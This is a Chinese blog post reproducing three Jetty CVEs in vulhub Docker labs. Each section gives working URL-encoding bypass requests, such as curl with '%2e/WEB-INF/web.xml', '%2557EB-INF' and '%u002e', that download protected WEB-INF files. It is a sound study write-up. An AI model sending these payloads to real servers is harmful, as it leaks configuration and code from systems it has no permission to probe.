vulhub漏洞复现30_Jetty
一、 CVE-2021-28164_Jetty WEB-INF 敏感信息泄露漏洞
前言
Eclipse Jetty是一个开源的servlet容器,它为基于Java的Web容器提供运行环境。
漏洞详情
Jetty 9.4.37引入对RFC3986的新实现,而URL编码的`.`字符被排除在URI规范之外,这个行为在RFC中是正确的,但在servlet的实现中导致攻击者可以通过`%2e`来绕过限制,下载WEB-INF目录下的任意文件,导致敏感信息泄露。该漏洞在9.4.39中修复。
漏洞环境
靶场:192.168.4.10:ubuntu
执行如下命令启动一个Jetty 9.4.37:
#docker-compose up -d
服务启动后,访问`http://your-ip:8080`可以查看到一个example页面。
漏洞复现
直接访问`/WEB-INF/web.xml`将会返回404页面:
使用`%2e/`来绕过限制下载web.xml:
```
curl -v 'http://192.168.1.162:8080/%2e/WEB-INF/web.xml'
```
二、CVE-2021-28169_Jetty 通用 Servlets 组件 ConcatServlet 信息泄露漏洞
前言
Eclipse Jetty是一个开源的servlet容器,它为基于Java的Web容器提供运行环境,而Jetty Servlets是Jetty提供给开发者的一些通用组件。
漏洞详情
在9.4.40, 10.0.2, 11.0.2版本前,Jetty Servlets中的`ConcatServlet`、`WelcomeFilter`类存在多重解码问题,如果开发者主动使用了这两个类,攻击者可以利用其访问WEB-INF目录下的敏感文件,造成配置文件及代码泄露。
漏洞环境
执行如下命令启动一个Jetty 9.4.40服务器:
#docker-compose up -d
环境启动后,访问`http://your-ip:8080`即可查看到一个example页面。该页面使用到了`ConcatServlet`来优化静态文件的加载:
```
<link rel="stylesheet" href="/static?/css/base.css&/css/app.css">
```
漏洞利用
正常通过`/static?/WEB-INF/web.xml`无法访问到敏感文件web.xml:
对字母`W`进行双URL编码,即可绕过限制访问web.xml:
```
curl -v 'http://your-ip:8080/static?/%2557EB-INF/web.xml'
```
三、 CVE-2021-34429_Jetty WEB-INF 敏感信息泄露漏洞
漏洞详情
Jetty在9.4.40后修复了因为`%2e`导致的敏感信息泄露漏洞[CVE-2021-28164](https://github.com/vulhub/vulhub/tree/master/jetty/CVE-2021-28164),但这个修复是不完全的,通过下面三种方式可以进行绕过:
- unicode形式URL编码:`/%u002e/WEB-INF/web.xml`
- `\0`组合`.`导致的绕过:`/.%00/WEB-INF/web.xml`
- `\0`组合`..`导致的绕过:`/a/b/..%00/WEB-INF/web.xml`
影响版本:9.4.37-9.4.42, 10.0.1-10.0.5, 11.0.1-11.0.5
漏洞环境
执行如下命令启动一个Jetty 9.4.40:
```
docker-compose up -d
```
服务启动后,访问`http://your-ip:8080`可以查看到一个example页面。
漏洞复现
直接访问`/WEB-INF/web.xml`将会返回404页面:
使用`/%u002e/WEB-INF/web.xml`来绕过限制下载web.xml:
vulhub漏洞复现30_Jetty相关推荐
- docker kali安装mysql_kali安装docker(有效详细的教程) ——vulhub漏洞复现 001
前记: 博主有着多次安装docker的丰富经验,曾经为了在kali成功安装docker花费不少时间.在kali2016.3一直到最新的kali2019.4都通吃!所以跟着下面的步骤走,绝对不会出错.( ...
- vulhub漏洞复现之bash(Shellshock CVE-2014-6271)
Shellshock 破壳漏洞 CVE-2014-6271 1.漏洞概述: GNU Bash 4.3及之前版本在评估某些构造的环境变量时存在安全漏洞,向环境变量值内的函数定义后添加多余的字符串会触发此 ...
- vulhub漏洞复现37_Liferay
CVE-2020-7961_Liferay Portal CE 反序列化命令执行漏洞 漏洞详情 Liferay Portal CE是一款用来快速构建网站的开源系统.其7.2.0 GA1及以前的版本AP ...
- vulhub漏洞复现-bash(CVE-2014-6271) shellshock-破壳漏洞
漏洞简介 破壳漏洞(shellshock),也被称为bashdoor,是广泛使用的Unix shell中的一系列安全漏洞,其中第一个漏洞于2014年9月24日被披露.许多面向互联网的服务,如一些网络服 ...
- [ vulhub漏洞复现篇 ] Apereo-cas 4.1 反序列化远程代码执行漏洞
- [ vulhub漏洞复现篇 ] GhostScript 沙箱绕过(任意命令执行)漏洞CVE-2018-16509
- [ vulhub漏洞复现篇 ] Jetty WEB-INF 文件读取复现CVE-2021-34429
- [ vulhub漏洞复现篇 ] ECShop 4.x collection_list SQL注入
- [ vulhub漏洞复现篇 ] vulhub 漏洞集合(含漏洞复现文章连接)
- 渗透测试-----信息收集(概述、whois、子域名查询、爆破、vulhub域名传送漏洞复现、kali安装docker)
文章目录 渗透测试 信息收集 1. 概述 2. 供练手的网站 3. whois查询 4. 子域名查询 域传送漏洞 1. 概述 2. 解决办法 3. vulhub漏洞复现 4. 子域名爆破 渗透测试 信 ...
最新文章
- UVa11464 - Even Parity(递推法)
- Linux SSH远程文件/目录传输命令scp
- 用Python实现一个1加到n求和功能的函数
- Interview:算法岗位面试—11.05下午上海某银行信息(总行,四大行之一)技术岗笔试记录
- MQTT(3)---MQTT协议及其在物联网中的应用
- 2020级C语言大作业 - 丛林大作战
- 数据结构笔记(三)-- 链式实现顺序表
- struts2 s:file标签使用及文件上传例子
- 音乐和计算机跨界融合,音乐类综艺跨界融合有了新思路
- 关于ExtJS错误“例外被抛出且未被接住”
- (附源码)ssm汽车租赁——持续输出BU 毕业设计 271621
- 改步数最新方法与工具,很好用
- The Code is successfully generatd...使用stm32cude生成工程时报错
- 儿子:特训营归来,许三多算个屁!(转)
- android手机为什么越用越卡
- RN常用UI组件技术选型
- 麻将胡牌递归算法(lua)
- 怎么调出全局搜索_华为手机怎么设置全局搜索,怎么开启以及怎么关闭
- 计算机主机并联,如何一台主机多台电脑使用
- 华为云计算机总裁,华为消费者业务 CEO余承东兼任华为云与计算 BG 总裁